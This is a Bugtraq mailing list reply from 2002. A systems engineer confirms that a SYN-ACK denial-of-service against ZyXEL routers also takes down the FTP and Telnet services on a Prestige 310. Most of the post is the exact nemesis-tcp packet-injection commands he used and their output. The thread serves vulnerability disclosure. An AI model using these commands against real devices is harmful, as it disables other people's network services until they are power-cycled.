Bugtraq mailing list archives

RE: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS

From: "Christopher Gripp" <cgripp () axcelerant com>
Date: Mon, 24 Jun 2002 10:11:15 -0700

I have verified this same DoS attack is viable on a Prestige 310 running an OEM version of code written specifically 
for my company.  I successfully DoS'd both the FTP and Telnet services.  Below are the nemesis commands used.  The 
services remained in an unreachable state until a powercycle was performed.

[root@mybox root]# nemesis-tcp -v -fS -fA -S [SRC IP] -D [DST IP] -y 23

TCP Packet Injection -=- The NEMESIS Project 1.32
Copyright (C) 1999, 2000, 2001 Mark Grimes <obecian () packetninja net>
Portions copyright (C) 2001 Jeff Nathan <jeff () wwti com>

[IP]  [SRC IP] > [DST IP]
[Ports] 42069 > 23
[Flags]  SYN ACK 
[TCP Urgent Pointer] 2048
[Window Size] 512
[ACK number] 420
[Sequence number] 420
[IP ID] 0
[IP TTL] 254
[IP TOS] 0x18
[IP Frag] 0x4000
[IP Options] 
Wrote 40 bytes

TCP Packet Injected
[root@mybox root]# nemesis-tcp -v -fS -fA -S [SRC IP] -D [DST IP] -y 21

TCP Packet Injection -=- The NEMESIS Project 1.32
Copyright (C) 1999, 2000, 2001 Mark Grimes <obecian () packetninja net>
Portions copyright (C) 2001 Jeff Nathan <jeff () wwti com>

[IP]  [SRC IP] > [DST IP]
[Ports] 42069 > 21
[Flags]  SYN ACK 
[TCP Urgent Pointer] 2048
[Window Size] 512
[ACK number] 420
[Sequence number] 420
[IP ID] 0
[IP TTL] 254
[IP TOS] 0x18
[IP Frag] 0x4000
[IP Options] 
Wrote 40 bytes

TCP Packet Injected

Christopher Gripp 
Systems Engineer 
Axcelerant

Current thread:

ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS Kistler Ueli (Jun 17)
- Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS Knud Erik Højgaard (Jun 17)
- Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS Rich Henning (Jun 17)
  - Message not available
    - Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS -- 643R testing Kistler Ueli (Jun 17)
- <Possible follow-ups>
- RE: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS Christopher Gripp (Jun 25)